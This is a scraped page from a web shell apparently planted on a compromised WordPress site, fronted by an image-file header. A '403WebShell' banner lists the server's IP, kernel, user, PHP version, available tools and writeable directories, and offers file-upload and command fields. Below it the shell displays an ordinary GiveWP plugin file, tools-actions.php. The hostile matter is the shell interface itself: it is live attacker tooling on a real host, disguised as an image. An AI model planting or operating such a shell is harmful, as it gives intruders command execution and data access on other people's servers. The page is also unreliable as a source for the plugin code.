????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.80.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/plugins/give/includes/admin/tools/data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/plugins/give/includes/admin/tools/data/tools-actions.php
<?php
/**
 * Tools Actions
 *
 * @package     Give
 * @subpackage  Admin/Tools
 * @copyright   Copyright (c) 2016, GiveWP
 * @license     https://opensource.org/licenses/gpl-license GNU Public License
 * @since       1.5
 */


if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * Register the recount batch processor.
 *
 * @since  1.5
 */
function give_register_batch_recount_export_classes() {
	add_action( 'give_batch_export_class_include', 'give_include_batch_export_class', 10, 1 );
}

add_action( 'give_register_batch_exporter', 'give_register_batch_recount_export_classes', 10 );


/**
 * Loads the tools batch processing classes.
 *
 * @since  1.8
 *
 * @param  string $class The class being requested to run for the batch export.
 *
 * @return void
 */
function give_include_batch_export_class( $class ) {
	switch ( $class ) {

		case 'Give_Tools_Delete_Donors':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-delete-test-donors.php';
			break;

		case 'Give_Tools_Import_Donors':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-delete-import-donors.php';
			break;

		case 'Give_Tools_Delete_Test_Transactions':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-delete-test-transactions.php';
			break;

		case 'Give_Tools_Recount_Donor_Stats':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-recount-donor-stats.php';
			break;

		case 'Give_Tools_Reset_Stats':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-reset-stats.php';
			break;

		case 'Give_Tools_Recount_All_Stats':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-recount-all-stats.php';
			break;

		case 'Give_Tools_Recount_Form_Stats':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-recount-form-stats.php';
			break;

		case 'Give_Tools_Recount_Income':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-recount-income.php';
			break;

		case 'Give_Tools_Delete_Donations':
			require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/data/class-give-tools-delete-donations.php';
			break;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit